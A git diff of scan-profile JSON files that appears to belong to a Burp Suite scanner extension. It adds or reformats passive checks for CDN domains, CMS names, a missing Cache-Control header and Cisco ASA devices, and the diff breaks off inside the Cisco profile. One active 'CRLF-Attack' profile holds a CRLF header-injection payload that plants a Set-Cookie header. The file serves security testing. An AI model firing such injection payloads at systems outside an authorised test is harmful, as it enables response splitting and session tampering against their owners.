"true,Or,.cdnify.io", + "true,Or,.ccgslb.com", + "true,Or,.ccgslb.net", + "true,Or,.c3cache.net", + "true,Or,.chinacache.net", + "true,Or,.c3cdn.net", + "true,Or,.lxdns.com", + "true,Or,.speedcdns.com", + "true,Or,.mwcloudcdn.com", + "true,Or,.cloudflare.com", + "true,Or,.cloudflare.net", + "true,Or,.edgecastcdn.net", + "true,Or,.fastly.net", + "true,Or,.fastlylb.net", + "true,Or,.googlesyndication.com", + "true,Or,.googleusercontent.com", + "true,Or,.l.doubleclick.net", + "true,Or,.hiberniacdn.com", + "true,Or,.hwcdn.net", + "true,Or,.incapdns.net", + "true,Or,.inscname.net", + "true,Or,.insnw.net", + "true,Or,.internapcdn.net", + "true,Or,.kxcdn.com", + "true,Or,.lswcdn.net", + "true,Or,.footprint.net", + "true,Or,.llnwd.net", + "true,Or,.lldns.net", + "true,Or,.netdna-cdn.com", + "true,Or,.netdna-ssl.com", + "true,Or,.netdna.com", + "true,Or,.stackpathdns.com", + "true,Or,.mncdn.com", + "true,Or,.instacontent.net", + "true,Or,.mirror-image.net", + "true,Or,.cap-mii.net", + "true,Or,.rncdn1.com", + "true,Or,.simplecdn.net", + "true,Or,.swiftcdn1.com", + "true,Or,.swiftserve.com", + "true,Or,.gslb.taobao.com", + "true,Or,.cdn.bitgravity.com", + "true,Or,.cdn.telefonica.com", + "true,Or,.vo.msecnd.net", + "true,Or,.ay1.b.yahoo.com", + "true,Or,.yimg.com", + "true,Or,.zenedge.net" + ], + "Tags": [ + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": true, + "IsContentType": true, + "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2", + "HttpResponseCode": "", + "NegativeCT": true, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 1, + "Scope": 2, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 0, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "CDN Detected", + "IssueSeverity": "Information", + "IssueConfidence": "Certain", + "IssueDetail": "", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/CMSDetection.bb b/profiles/CMSDetection.bb new file mode 100755 index 0000000..e258035 --- /dev/null +++ b/profiles/CMSDetection.bb @@ -0,0 +1,71 @@ +[ + { + "ProfileName": "CMSDetection", + "Name": "", + "Enabled": true, + "Scanner": 2, + "Author": "@egarme", + "Payloads": [], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,Wordpress", + "true,Or,Drupal", + "true,Or,Joomla", + "true,Or,Magento", + "true,Or,concre5", + "true,Or,SharePoint", + "true,Or,django", + "true,Or,XOOPS", + "true,Or,BigCommerce", + "true,Or,Weebly", + "true,Or,Ecwid", + "true,Or,3dcart", + "true,Or,WooCommerce" + ], + "Tags": [ + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": false, + "ContentType": "", + "HttpResponseCode": "", + "NegativeCT": false, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 1, + "Scope": 2, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 0, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "CMSDetection", + "IssueSeverity": "Information", + "IssueConfidence": "Firm", + "IssueDetail": "CMS Found: \u003cbr\u003e\u003cgrep\u003e", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/CMS_Found.bb b/profiles/CMS_Found.bb old mode 100644 new mode 100755 index 5ab12c6..9c1d835 --- a/profiles/CMS_Found.bb +++ b/profiles/CMS_Found.bb @@ -1 +1,393 @@ -[{"Name":"CMS_Found","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,Wordpress","true,Or,Drupal","true,Or,Joomla","true,Or,Magento","true,Or,Webnode","true,Or,Shopsys","true,Or,Shoptet","true,Or,vBulletin","true,Or,Liferay","true,Or,A-Blog Cms","true,Or,AVE cms","true,Or,Adobe Dreamweaver","true,Or,Adobe GoLive","true,Or,Adobe Muse","true,Or,Advantshop","true,Or,Agility CMS","true,Or,Alterian","true,Or,Amiro.CMS","true,Or,Apache Lenya","true,Or,ASP.NET","true,Or,Backdrop CMS","true,Or,BaseKit","true,Or,Big Cartel","true,Or,Bigace","true,Or,Blogger","true,Or,Bolt","true,Or,Bootply","true,Or,Bricolage CMS","true,Or,C1 CMS","true,Or,CM4all","true,Or,CMS-Tool","true,Or,CMS Made Simple","true,Or,CMSimple","true,Or,CMSimple_XH","true,Or,CanalBlog","true,Or,Cargo","true,Or,Centricity","true,Or,Chevereto","true,Or,Ciashop","true,Or,CivicEngage","true,Or,CoffeeCup","true,Or,CommonSpot","true,Or,Contao","true,Or,Contenido CMS","true,Or,Contensis CMS","true,Or,ContentXXL","true,Or,Convio","true,Or,Coppermine","true,Or,CoreMedia CMS","true,Or,Corepublish","true,Or,Crowd Fusion","true,Or,CubeCart","true,Or,DIAFAN.CMS","true,Or,DNN","true,Or,Danneo","true,Or,DataLife Engine","true,Or,Dealer.com","true,Or,DealerFire","true,Or,Demandware","true,Or,Dim Works","true,Or,Discourse","true,Or,Hycus","true,Or,Discuz!","true,Or,DokuWiki","true,Or,DotClear","true,Or,DotEasy","true,Or,LiteCart","true,Or,DreamCommerce","true,Or,Duda","true,Or,Dynamicweb","true,Or,E+ CMS","true,Or,E-monsite","true,Or,ECShop","true,Or,Easysite","true,Or,EditPlus","true,Or,Edito","true,Or,Enonic CMS","true,Or,Episerver","true,Or,Everweb","true,Or,Fork CMS","true,Or,Zeta Producer","true,Or,Flarum","true,Or,Format","true,Or,FrontPage","true,Or,GX Web Manager","true,Or,Geeklog","true,Or,GetSimple CMS","true,Or,Ghost","true,Or,GoDaddy Website Builder","true,Or,Google Sites","true,Or,Government Site Builder","true,Or,GraffitiCMS","true,Or,Grav CMS","true,Or,Hexo","true,Or,Homes.com Fusion","true,Or,Homestead","true,Or,HostCMS","true,Or,HostedShop","true,Or,HubSpot","true,Or,Hugo","true,Or,HumHub","true,Or,IPS Community Suite","true,Or,ImageCMS","true,Or,Immediacy","true,Or,Imperia CMS","true,Or,ImpressCMS","true,Or,ImpressPages CMS","true,Or,Infopark CMS Fiona","true,Or,InstantCMS","true,Or,InterRed","true,Or,Intershop","true,Or,JTL-Shop","true,Or,Jadu CMS","true,Or,Jekyll","true,Or,JetShop","true,Or,Jieqi CMS","true,Or,Jimdo","true,Or,JustSystems Homepage Builder","true,Or,KVS CMS","true,Or,Koken","true,Or,Komodo CMS","true,Or,Kooboo","true,Or,Kryptronic","true,Or,Labrador CMS","true,Or,Lauyan TOWeb","true,Or,LeadPages","true,Or,LightCMS","true,Or,Lightspeed","true,Or,LiveEdit","true,Or,Livedoor Blog","true,Or,Livestreet CMS","true,Or,Locomotive CMS","true,Or,LogiCommerce","true,Or,Loja Integrada","true,Or,MONO","true,Or,Mabisy","true,Or,MakeShop","true,Or,Mambo","true,Or,MaxSite CMS","true,Or,MediaWiki","true,Or,Medium","true,Or,Melody","true,Or,Metro Publisher","true,Or,Microsoft Word","true,Or,Midgard CMS","true,Or,Mijnwebwinkel","true,Or,Mintox","true,Or,Miva Merchant","true,Or,Mobirise","true,Or,Modified Shopsoftware","true,Or,Modx CMS","true,Or,MoinMoin","true,Or,Movable Type","true,Or,Mura","true,Or,Méthode","true,Or,NQcontent","true,Or,Nation Builder","true,Or,Neos","true,Or,NetObjects","true,Or,NetSuite","true,Or,Netvolution","true,Or,Nextcloud","true,Or,Ning","true,Or,Nodebb","true,Or,Notepad++","true,Or,Nucleus CMS","true,Or,NukeViet","true,Or,OU Campus","true,Or,OXID eSales","true,Or,Octopress","true,Or,Odoo","true,Or,One.com","true,Or,Open CMS","true,Or,Open Journal Systems","true,Or,OpenNemas","true,Or,OpenOffice","true,Or,Orchard","true,Or,Orthodox Web Solutions","true,Or,Osclass","true,Or,Overblog","true,Or,Oxatis","true,Or,PHP-Fusion","true,Or,PHP-Nuke","true,Or,PHP Link Directory","true,Or,PHPShop","true,Or,PHPVibe","true,Or,PageCloud","true,Or,Pagekit","true,Or,Pangea CMS","true,Or,Parallels Presence Builder","true,Or,Pelican","true,Or,Perch","true,Or,Percussion","true,Or,Pimcore","true,Or,Piwigo","true,Or,Plone","true,Or,PowerBoutique","true,Or,PrestaShop","true,Or,ProcessWire","true,Or,Pydio","true,Or,Quick.CMS","true,Or,Quick.Cart","true,Or,RCMS","true,Or,RVsitebuilder","true,Or,RapidWeaver","true,Or,Ready Pro Ecommerce","true,Or,Ruby on Rails","true,Or,SNworks","true,Or,SUMOshop","true,Or,Salesforce","true,Or,Sana Commerce","true,Or,Sandvox","true,Or,SchoolSitePro","true,Or,Seamless CMS","true,Or,SeoToaster","true,Or,Serendipity","true,Or,Setup.ru","true,Or,SharePoint","true,Or,ShopFactory","true,Or,Shopify","true,Or,Shoptet","true,Or,Shopware","true,Or,Showoff","true,Or,SilverStripe CMS","true,Or,Simple Machines Forum","true,Or,Siquando","true,Or,SiteDirect","true,Or,SiteKreator","true,Or,SitePad","true,Or,SiteSpinner","true,Or,Sitefinity","true,Or,Sitonline","true,Or,Sitoo","true,Or,SmartEtailing","true,Or,SmartStore.NET","true,Or,SmugMug","true,Or,SocialEngine","true,Or,Sparkle CMS","true,Or,Spip","true,Or,Squarespace","true,Or,Squiz","true,Or,Strikingly","true,Or,Sulu CMS","true,Or,Tailbase","true,Or,Tangora Web CMS","true,Or,Telligent","true,Or,Tempest","true,Or,Textalk Webshop","true,Or,Textpattern CMS","true,Or,ThinkCMF","true,Or,ThinkPHP","true,Or,Ticimax","true,Or,Tiki Wiki CMS","true,Or,Tilda","true,Or,Trellix","true,Or,Tumblr","true,Or,TypePad","true,Or,Typecho","true,Or,Typesetter","true,Or,Typo3","true,Or,UBB.threads","true,Or,UMI.CMS","true,Or,Ultimize CMS","true,Or,Umbraco","true,Or,Vanilla Forums","true,Or,Vigbo","true,Or,Vision","true,Or,Visual Studio","true,Or,Visualsoft","true,Or,Vivvo","true,Or,Volusion","true,Or,WMaker","true,Or,WYSIWYG Web Builder","true,Or,Web 2 Date","true,Or,WebAcappella","true,Or,Web Commander","true,Or,WebGUI","true,Or,Web Page Maker","true,Or,WebPlus","true,Or,Web Presence Builder","true,Or,Web Shop Manager","true,Or,WebSite Tonight","true,Or,WebSphere Studio Homepage Builder","true,Or,Webflow","true,Or,Weblication","true,Or,Webs","true,Or,Websale","true,Or,WebsiteBuilder","true,Or,WebSite X5","true,Or,Websplanet","true,Or,Webvision","true,Or,Weebly","true,Or,Wheel CMS","true,Or,Wikispaces","true,Or,Wix","true,Or,WiziShop","true,Or,WoltLab","true,Or,XT-Commerce","true,Or,Xara","true,Or,XenForo","true,Or,Xiuno BBS","true,Or,Xoops","true,Or,XpressEngine","true,Or,X‑Cart","true,Or,YaBB","true,Or,Yahoo Small Business","true,Or,Yellow Pages Canada","true,Or,Yola","true,Or,ZMS","true,Or,Zen Cart","true,Or,Zendesk","true,Or,Zoho Sites","true,Or,Zyro","true,Or,b2evolution","true,Or,blog.ir","true,Or,cloudrexx","true,Or,concrete5","true,Or,docsify","true,Or,dotCMS","true,Or,e107","true,Or,ePages","true,Or,eSyndiCat","true,Or,eZ Publish","true,Or,elcomCMS","true,Or,fCMS","true,Or,iWeb","true,Or,kimsq","true,Or,nopCommerce","true,Or,onpublix CMS","true,Or,1C-Bitrix","true,Or,pTools","true,Or,phpwcms","true,Or,phpwind","true,Or,plentymarkets","true,Or,uCoz"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":true,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"CMS Detected","IssueSeverity":"Information","IssueConfidence":"Firm","IssueDetail":"CMS Detected","RemediationDetail":"CMS Detected","IssueBackground":"CMS Detected","RemediationBackground":"CMS Detected","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "CMS_Found", + "Name": "", + "Enabled": true, + "Scanner": 2, + "Author": "@six2dez1", + "Payloads": [], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,Wordpress", + "true,Or,Drupal", + "true,Or,Joomla", + "true,Or,Magento", + "true,Or,Webnode", + "true,Or,Shopsys", + "true,Or,Shoptet", + "true,Or,vBulletin", + "true,Or,Liferay", + "true,Or,A-Blog Cms", + "true,Or,AVE cms", + "true,Or,Adobe Dreamweaver", + "true,Or,Adobe GoLive", + "true,Or,Adobe Muse", + "true,Or,Advantshop", + "true,Or,Agility CMS", + "true,Or,Alterian", + "true,Or,Amiro.CMS", + "true,Or,Apache Lenya", + "true,Or,ASP.NET", + "true,Or,Backdrop CMS", + "true,Or,BaseKit", + "true,Or,Big Cartel", + "true,Or,Bigace", + "true,Or,Blogger", + "true,Or,Bolt", + "true,Or,Bootply", + "true,Or,Bricolage CMS", + "true,Or,C1 CMS", + "true,Or,CM4all", + "true,Or,CMS-Tool", + "true,Or,CMS Made Simple", + "true,Or,CMSimple", + "true,Or,CMSimple_XH", + "true,Or,CanalBlog", + "true,Or,Cargo", + "true,Or,Centricity", + "true,Or,Chevereto", + "true,Or,Ciashop", + "true,Or,CivicEngage", + "true,Or,CoffeeCup", + "true,Or,CommonSpot", + "true,Or,Contao", + "true,Or,Contenido CMS", + "true,Or,Contensis CMS", + "true,Or,ContentXXL", + "true,Or,Convio", + "true,Or,Coppermine", + "true,Or,CoreMedia CMS", + "true,Or,Corepublish", + "true,Or,Crowd Fusion", + "true,Or,CubeCart", + "true,Or,DIAFAN.CMS", + "true,Or,DNN", + "true,Or,Danneo", + "true,Or,DataLife Engine", + "true,Or,Dealer.com", + "true,Or,DealerFire", + "true,Or,Demandware", + "true,Or,Dim Works", + "true,Or,Discourse", + "true,Or,Hycus", + "true,Or,Discuz!", + "true,Or,DokuWiki", + "true,Or,DotClear", + "true,Or,DotEasy", + "true,Or,LiteCart", + "true,Or,DreamCommerce", + "true,Or,Duda", + "true,Or,Dynamicweb", + "true,Or,E+ CMS", + "true,Or,E-monsite", + "true,Or,ECShop", + "true,Or,Easysite", + "true,Or,EditPlus", + "true,Or,Edito", + "true,Or,Enonic CMS", + "true,Or,Episerver", + "true,Or,Everweb", + "true,Or,Fork CMS", + "true,Or,Zeta Producer", + "true,Or,Flarum", + "true,Or,Format", + "true,Or,FrontPage", + "true,Or,GX Web Manager", + "true,Or,Geeklog", + "true,Or,GetSimple CMS", + "true,Or,Ghost", + "true,Or,GoDaddy Website Builder", + "true,Or,Google Sites", + "true,Or,Government Site Builder", + "true,Or,GraffitiCMS", + "true,Or,Grav CMS", + "true,Or,Hexo", + "true,Or,Homes.com Fusion", + "true,Or,Homestead", + "true,Or,HostCMS", + "true,Or,HostedShop", + "true,Or,HubSpot", + "true,Or,Hugo", + "true,Or,HumHub", + "true,Or,IPS Community Suite", + "true,Or,ImageCMS", + "true,Or,Immediacy", + "true,Or,Imperia CMS", + "true,Or,ImpressCMS", + "true,Or,ImpressPages CMS", + "true,Or,Infopark CMS Fiona", + "true,Or,InstantCMS", + "true,Or,InterRed", + "true,Or,Intershop", + "true,Or,JTL-Shop", + "true,Or,Jadu CMS", + "true,Or,Jekyll", + "true,Or,JetShop", + "true,Or,Jieqi CMS", + "true,Or,Jimdo", + "true,Or,JustSystems Homepage Builder", + "true,Or,KVS CMS", + "true,Or,Koken", + "true,Or,Komodo CMS", + "true,Or,Kooboo", + "true,Or,Kryptronic", + "true,Or,Labrador CMS", + "true,Or,Lauyan TOWeb", + "true,Or,LeadPages", + "true,Or,LightCMS", + "true,Or,Lightspeed", + "true,Or,LiveEdit", + "true,Or,Livedoor Blog", + "true,Or,Livestreet CMS", + "true,Or,Locomotive CMS", + "true,Or,LogiCommerce", + "true,Or,Loja Integrada", + "true,Or,MONO", + "true,Or,Mabisy", + "true,Or,MakeShop", + "true,Or,Mambo", + "true,Or,MaxSite CMS", + "true,Or,MediaWiki", + "true,Or,Medium", + "true,Or,Melody", + "true,Or,Metro Publisher", + "true,Or,Microsoft Word", + "true,Or,Midgard CMS", + "true,Or,Mijnwebwinkel", + "true,Or,Mintox", + "true,Or,Miva Merchant", + "true,Or,Mobirise", + "true,Or,Modified Shopsoftware", + "true,Or,Modx CMS", + "true,Or,MoinMoin", + "true,Or,Movable Type", + "true,Or,Mura", + "true,Or,Méthode", + "true,Or,NQcontent", + "true,Or,Nation Builder", + "true,Or,Neos", + "true,Or,NetObjects", + "true,Or,NetSuite", + "true,Or,Netvolution", + "true,Or,Nextcloud", + "true,Or,Ning", + "true,Or,Nodebb", + "true,Or,Notepad++", + "true,Or,Nucleus CMS", + "true,Or,NukeViet", + "true,Or,OU Campus", + "true,Or,OXID eSales", + "true,Or,Octopress", + "true,Or,Odoo", + "true,Or,One.com", + "true,Or,Open CMS", + "true,Or,Open Journal Systems", + "true,Or,OpenNemas", + "true,Or,OpenOffice", + "true,Or,Orchard", + "true,Or,Orthodox Web Solutions", + "true,Or,Osclass", + "true,Or,Overblog", + "true,Or,Oxatis", + "true,Or,PHP-Fusion", + "true,Or,PHP-Nuke", + "true,Or,PHP Link Directory", + "true,Or,PHPShop", + "true,Or,PHPVibe", + "true,Or,PageCloud", + "true,Or,Pagekit", + "true,Or,Pangea CMS", + "true,Or,Parallels Presence Builder", + "true,Or,Pelican", + "true,Or,Perch", + "true,Or,Percussion", + "true,Or,Pimcore", + "true,Or,Piwigo", + "true,Or,Plone", + "true,Or,PowerBoutique", + "true,Or,PrestaShop", + "true,Or,ProcessWire", + "true,Or,Pydio", + "true,Or,Quick.CMS", + "true,Or,Quick.Cart", + "true,Or,RCMS", + "true,Or,RVsitebuilder", + "true,Or,RapidWeaver", + "true,Or,Ready Pro Ecommerce", + "true,Or,Ruby on Rails", + "true,Or,SNworks", + "true,Or,SUMOshop", + "true,Or,Salesforce", + "true,Or,Sana Commerce", + "true,Or,Sandvox", + "true,Or,SchoolSitePro", + "true,Or,Seamless CMS", + "true,Or,SeoToaster", + "true,Or,Serendipity", + "true,Or,Setup.ru", + "true,Or,SharePoint", + "true,Or,ShopFactory", + "true,Or,Shopify", + "true,Or,Shoptet", + "true,Or,Shopware", + "true,Or,Showoff", + "true,Or,SilverStripe CMS", + "true,Or,Simple Machines Forum", + "true,Or,Siquando", + "true,Or,SiteDirect", + "true,Or,SiteKreator", + "true,Or,SitePad", + "true,Or,SiteSpinner", + "true,Or,Sitefinity", + "true,Or,Sitonline", + "true,Or,Sitoo", + "true,Or,SmartEtailing", + "true,Or,SmartStore.NET", + "true,Or,SmugMug", + "true,Or,SocialEngine", + "true,Or,Sparkle CMS", + "true,Or,Spip", + "true,Or,Squarespace", + "true,Or,Squiz", + "true,Or,Strikingly", + "true,Or,Sulu CMS", + "true,Or,Tailbase", + "true,Or,Tangora Web CMS", + "true,Or,Telligent", + "true,Or,Tempest", + "true,Or,Textalk Webshop", + "true,Or,Textpattern CMS", + "true,Or,ThinkCMF", + "true,Or,ThinkPHP", + "true,Or,Ticimax", + "true,Or,Tiki Wiki CMS", + "true,Or,Tilda", + "true,Or,Trellix", + "true,Or,Tumblr", + "true,Or,TypePad", + "true,Or,Typecho", + "true,Or,Typesetter", + "true,Or,Typo3", + "true,Or,UBB.threads", + "true,Or,UMI.CMS", + "true,Or,Ultimize CMS", + "true,Or,Umbraco", + "true,Or,Vanilla Forums", + "true,Or,Vigbo", + "true,Or,Vision", + "true,Or,Visual Studio", + "true,Or,Visualsoft", + "true,Or,Vivvo", + "true,Or,Volusion", + "true,Or,WMaker", + "true,Or,WYSIWYG Web Builder", + "true,Or,Web 2 Date", + "true,Or,WebAcappella", + "true,Or,Web Commander", + "true,Or,WebGUI", + "true,Or,Web Page Maker", + "true,Or,WebPlus", + "true,Or,Web Presence Builder", + "true,Or,Web Shop Manager", + "true,Or,WebSite Tonight", + "true,Or,WebSphere Studio Homepage Builder", + "true,Or,Webflow", + "true,Or,Weblication", + "true,Or,Webs", + "true,Or,Websale", + "true,Or,WebsiteBuilder", + "true,Or,WebSite X5", + "true,Or,Websplanet", + "true,Or,Webvision", + "true,Or,Weebly", + "true,Or,Wheel CMS", + "true,Or,Wikispaces", + "true,Or,Wix", + "true,Or,WiziShop", + "true,Or,WoltLab", + "true,Or,XT-Commerce", + "true,Or,Xara", + "true,Or,XenForo", + "true,Or,Xiuno BBS", + "true,Or,Xoops", + "true,Or,XpressEngine", + "true,Or,X‑Cart", + "true,Or,YaBB", + "true,Or,Yahoo Small Business", + "true,Or,Yellow Pages Canada", + "true,Or,Yola", + "true,Or,ZMS", + "true,Or,Zen Cart", + "true,Or,Zendesk", + "true,Or,Zoho Sites", + "true,Or,Zyro", + "true,Or,b2evolution", + "true,Or,blog.ir", + "true,Or,cloudrexx", + "true,Or,concrete5", + "true,Or,docsify", + "true,Or,dotCMS", + "true,Or,e107", + "true,Or,ePages", + "true,Or,eSyndiCat", + "true,Or,eZ Publish", + "true,Or,elcomCMS", + "true,Or,fCMS", + "true,Or,iWeb", + "true,Or,kimsq", + "true,Or,nopCommerce", + "true,Or,onpublix CMS", + "true,Or,1C-Bitrix", + "true,Or,pTools", + "true,Or,phpwcms", + "true,Or,phpwind", + "true,Or,plentymarkets", + "true,Or,uCoz" + ], + "Tags": [ + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": true, + "IsContentType": true, + "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2", + "HttpResponseCode": "", + "NegativeCT": true, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 1, + "Scope": 2, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 0, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "CMS Detected", + "IssueSeverity": "Information", + "IssueConfidence": "Firm", + "IssueDetail": "CMS Detected", + "RemediationDetail": "CMS Detected", + "IssueBackground": "CMS Detected", + "RemediationBackground": "CMS Detected", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/CRLF-Attack.bb b/profiles/CRLF-Attack.bb index 7abff5a..c792bc9 100755 --- a/profiles/CRLF-Attack.bb +++ b/profiles/CRLF-Attack.bb @@ -1 +1,97 @@ -[{"Name":"CRLF-Attack","Enabled":true,"Scanner":1,"Author":"@egarme","Payloads":["%0D%0ASet-Cookie:%20mycookie\u003dmyvalue"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["true,Or, ^Set-Cookie:\\smycookie\u003dmyvalue"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":true,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":3,"MaxRedir":3,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"CRLF-Attack","IssueSeverity":"Medium","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[],"VariationAttributes":[],"InsertionPointType":[18,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "CRLF-Attack", + "Name": "", + "Enabled": true, + "Scanner": 1, + "Author": "@egarme", + "Payloads": [ + "true,%0D%0ASet-Cookie:%20mycookie\u003dmyvalue" + ], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,, ^Set-Cookie:\\smycookie\u003dmyvalue" + ], + "Tags": [ + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": true, + "IsContentType": false, + "ContentType": "", + "HttpResponseCode": "", + "NegativeCT": false, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 1, + "Scope": 0, + "RedirType": 3, + "MaxRedir": 3, + "payloadPosition": 1, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "CRLF-Attack", + "IssueSeverity": "Medium", + "IssueConfidence": "Certain", + "IssueDetail": "", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [ + 18, + 65, + 32, + 36, + 7, + 1, + 2, + 6, + 33, + 5, + 35, + 34, + 64, + 0, + 3, + 4, + 37, + 127, + 65, + 32, + 36, + 7, + 1, + 2, + 6, + 33, + 5, + 35, + 34, + 64, + 0, + 3, + 4, + 37, + 127 + ], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/Cache-Control.bb b/profiles/Cache-Control.bb new file mode 100755 index 0000000..f4d8404 --- /dev/null +++ b/profiles/Cache-Control.bb @@ -0,0 +1,59 @@ +[ + { + "ProfileName": "Cache-Control", + "Name": "", + "Enabled": true, + "Scanner": 2, + "Author": "@egarme", + "Payloads": [], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,Cache-Control: no-store" + ], + "Tags": [ + "All" + ], + "PayloadResponse": false, + "NotResponse": true, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": true, + "IsContentType": false, + "ContentType": "", + "HttpResponseCode": "", + "NegativeCT": false, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 1, + "Scope": 2, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 0, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "Cache-Control", + "IssueSeverity": "Information", + "IssueConfidence": "Firm", + "IssueDetail": "Security Header \"Cache-Control\" not present in response.", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/Cisco_ASA_Device_Found.bb b/profiles/Cisco_ASA_Device_Found.bb index 425e011..0123621 100755 --- a/profiles/Cisco_ASA_Device_Found.bb +++ b/profiles/Cisco_ASA_Device_Found.bb @@ -1 +1,60 @@ -[{"Name":"Cisco_ASA_Device_Found","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,+CSCOE+","true,Or,+CSCOT+"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"Cisco ASA Device Found (Passive)","IssueSeverity":"Low","IssueConfidence":"Certain","IssueDetail":"Cisco ASA Device Found (Passive)","RemediationDetail":"Cisco ASA Device Found (Passive)","IssueBackground":"Cisco ASA Device Found (Passive)","RemediationBackground":"Cisco ASA Device Found (Passive)","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "Cisco_ASA_Device_Found", + "Name": "", + "Enabled": true, + "Scanner": 2, + "Author": "@six2dez1", + "Payloads": [], + "Encoder": [], + 